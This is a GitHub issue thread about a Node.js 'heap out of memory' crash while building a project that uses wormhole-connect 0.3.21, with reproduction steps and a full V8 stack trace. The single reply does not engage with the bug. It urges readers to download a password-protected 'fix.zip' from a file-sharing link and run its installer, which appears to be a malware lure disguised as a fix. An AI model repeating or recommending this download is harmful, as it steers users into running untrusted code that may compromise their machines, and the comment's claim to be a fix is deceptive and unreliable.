### ISSUE TITLE
[Bug] FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory

### ISSUE THREAD

**Issue by arianshi** [wormhole-foundation/wormhole-connect#2448]
## Description and context
When I use version      "@wormhole-foundation/wormhole-connect": "0.3.21", and build dist shows errors:
FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory

## Steps to reproduce

1.  yarn add  "@wormhole-foundation/wormhole-connect": "0.3.21"
2. yarn run build:dev ("build:dev": "NODE_OPTIONS=--max-old-space-size=8192 tsc && env-cmd -f .env vite build --mode production --outDir dist/development")
3. showing errors:  JavaScript heap out of memory

<img width="1019" alt="image" src="https://github.com/user-attachments/assets/96e92b70-9ada-4b26-88cf-4edbdfa47354">

<--- Last few GCs --->

[9167:0x150008000]    28430 ms: Scavenge (reduce) 4070.1 (4140.4) -> 4069.7 (4140.0) MB, 1.88 / 0.00 ms  (average mu = 0.176, current mu = 0.018) allocation failure; 
[9167:0x150008000]    30105 ms: Mark-Compact (reduce) 4074.2 (4143.8) -> 4073.3 (4143.6) MB, 1475.25 / 0.00 ms  (average mu = 0.140, current mu = 0.122) allocation failure; GC in old space requested

<--- JS stacktrace --->

FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory
----- Native stack trace -----

 1: 0x102d0f4c4 node::OOMErrorHandler(char const*, v8::OOMDetails const&) [/usr/local/bin/node]
 2: 0x102eb436c v8::internal::V8::FatalProcessOutOfMemory(v8::internal::Isolate*, char const*, v8::OOMDetails const&) [/usr/local/bin/node]
 3: 0x103094b4c v8::internal::Heap::stack() [/usr/local/bin/node]
 4: 0x103098470 v8::internal::Heap::CollectGarbageShared(v8::internal::LocalHeap*, v8::internal::GarbageCollectionReason) [/usr/local/bin/node]
 5: 0x1030970bc v8::internal::Heap::PerformGarbageCollection(v8::internal::GarbageCollector, v8::internal::GarbageCollectionReason, char const*) [/usr/local/bin/node]
 6: 0x1030a7e90 v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollectionReason, v8::GCCallbackFlags)::$_6::operator()() const [/usr/local/bin/node]
 7: 0x1030a7a7c void heap::base::Stack::SetMarkerAndCallbackImpl<v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollectionReason, v8::GCCallbackFlags)::$_6>(heap::base::Stack*, void*, void const*) [/usr/local/bin/node]
 8: 0x1036e1b08 PushAllRegistersAndIterateStack [/usr/local/bin/node]
 9: 0x103092c1c v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollectionReason, v8::GCCallbackFlags) [/usr/local/bin/node]
10: 0x10308a048 v8::internal::HeapAllocator::AllocateRawWithLightRetrySlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [/usr/local/bin/node]
11: 0x10308a8e4 v8::internal::HeapAllocator::AllocateRawWithRetryOrFailSlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [/usr/local/bin/node]
12: 0x10306e698 v8::internal::Factory::NewFillerObject(int, v8::internal::AllocationAlignment, v8::internal::AllocationType, v8::internal::AllocationOrigin) [/usr/local/bin/node]
13: 0x10343c87c v8::internal::Runtime_AllocateInOldGeneration(int, unsigned long*, v8::internal::Isolate*) [/usr/local/bin/node]
14: 0x1037d7954 Builtins_CEntry_Return1_ArgvOnStack_NoBuiltinExit [/usr/local/bin/node]
15: 0x10935df44 
16: 0x10944c1f0 
17: 0x1037592c8 Builtins_LoadIC_NoFeedback [/usr/local/bin/node]
18: 0x10389cfdc Builtins_GetNamedPropertyHandler [/usr/local/bin/node]
19: 0x10374cb84 Builtins_InterpreterEntryTrampoline [/usr/local/bin/node]
20: 0x10374cb84 Builtins_InterpreterEntryTrampoline [/usr/local/bin/node]
21: 0x10374cb84 Builtins_InterpreterEntryTrampoline [/usr/local/bin/node]
22: 0x10950a1e4 
23: 0x109621ad4 
24: 0x109509d48 
25: 0x109621ad4 
26: 0x109621c2c 
27: 0x109621c2c 
28: 0x109621ad4 
29: 0x109621c2c 
30: 0x109621ad4 
31: 0x109621d2c 
32: 0x109633044 
33: 0x10374cb84 Builtins_InterpreterEntryTrampoline [/usr/local/bin/node]
34: 0x10374cb84 Builtins_InterpreterEntryTrampoline [/usr/local/bin/node]
35: 0x103783b10 Builtins_AsyncFunctionAwaitResolveClosure [/usr/local/bin/node]
36: 0x10383d2d8 Builtins_PromiseFulfillReactionJob [/usr/local/bin/node]
37: 0x103772654 Builtins_RunMicrotasks [/usr/local/bin/node]
38: 0x10374a794 Builtins_JSRunMicrotasksEntry [/usr/local/bin/node]
39: 0x102ff68b8 v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) [/usr/local/bin/node]
40: 0x102ff6d68 v8::internal::(anonymous namespace)::InvokeWithTryCatch(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) [/usr/local/bin/node]
41: 0x102ff6f14 v8::internal::Execution::TryRunMicrotasks(v8::internal::Isolate*, v8::internal::MicrotaskQueue*) [/usr/local/bin/node]
42: 0x10301eb24 v8::internal::MicrotaskQueue::RunMicrotasks(v8::internal::Isolate*) [/usr/local/bin/node]
43: 0x10301f2c0 v8::internal::MicrotaskQueue::PerformCheckpoint(v8::Isolate*) [/usr/local/bin/node]
44: 0x10374eb90 Builtins_CallApiCallbackOptimizedNoProfiling [/usr/local/bin/node]
45: 0x10934f3e4 
46: 0x10374a8ac Builtins_JSEntryTrampoline [/usr/local/bin/node]
47: 0x10374a594 Builtins_JSEntry [/usr/local/bin/node]
48: 0x102ff68e0 v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) [/usr/local/bin/node]
49: 0x102ff5e60 v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) [/usr/local/bin/node]
50: 0x102ecdce8 v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) [/usr/local/bin/node]
51: 0x102c3cd24 node::InternalCallbackScope::Close() [/usr/local/bin/node]
52: 0x102c3cfe4 node::InternalMakeCallback(node::Environment*, v8::Local<v8::Object>, v8::Local<v8::Object>, v8::Local<v8::Function>, int, v8::Local<v8::Value>*, node::async_context) [/usr/local/bin/node]
53: 0x102c53dc0 node::AsyncWrap::MakeCallback(v8::Local<v8::Function>, int, v8::Local<v8::Value>*) [/usr/local/bin/node]
54: 0x102ddcadc node::StreamBase::CallJSOnreadMethod(long, v8::Local<v8::ArrayBuffer>, unsigned long, node::StreamBase::StreamBaseJSChecks) [/usr/local/bin/node]
55: 0x102dde158 node::EmitToJSStreamListener::OnStreamRead(long, uv_buf_t const&) [/usr/local/bin/node]
56: 0x102de2448 node::LibuvStreamWrap::OnUvRead(long, uv_buf_t const*) [/usr/local/bin/node]
57: 0x102de2b7c node::LibuvStreamWrap::ReadStart()::$_1::__invoke(uv_stream_s*, long, uv_buf_t const*) [/usr/local/bin/node]
58: 0x103735e00 uv__stream_io [/usr/local/bin/node]
59: 0x10373d814 uv__io_poll [/usr/local/bin/node]
60: 0x10372b814 uv_run [/usr/local/bin/node]
61: 0x102c3d6f0 node::SpinEventLoopInternal(node::Environment*) [/usr/local/bin/node]
62: 0x102d4e44c node::NodeMainInstance::Run(node::ExitCode*, node::Environment*) [/usr/local/bin/node]
63: 0x102d4e1f8 node::NodeMainInstance::Run() [/usr/local/bin/node]
64: 0x102cd9da4 node::Start(int, char**) [/usr/local/bin/node]
65: 0x1821190e0 start [/usr/lib/dyld]
/bin/sh: line 1:  9158 Abort trap: 6           env-cmd -f .env vite build --mode production --outDir dist/development
error Command failed with exit code 134.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
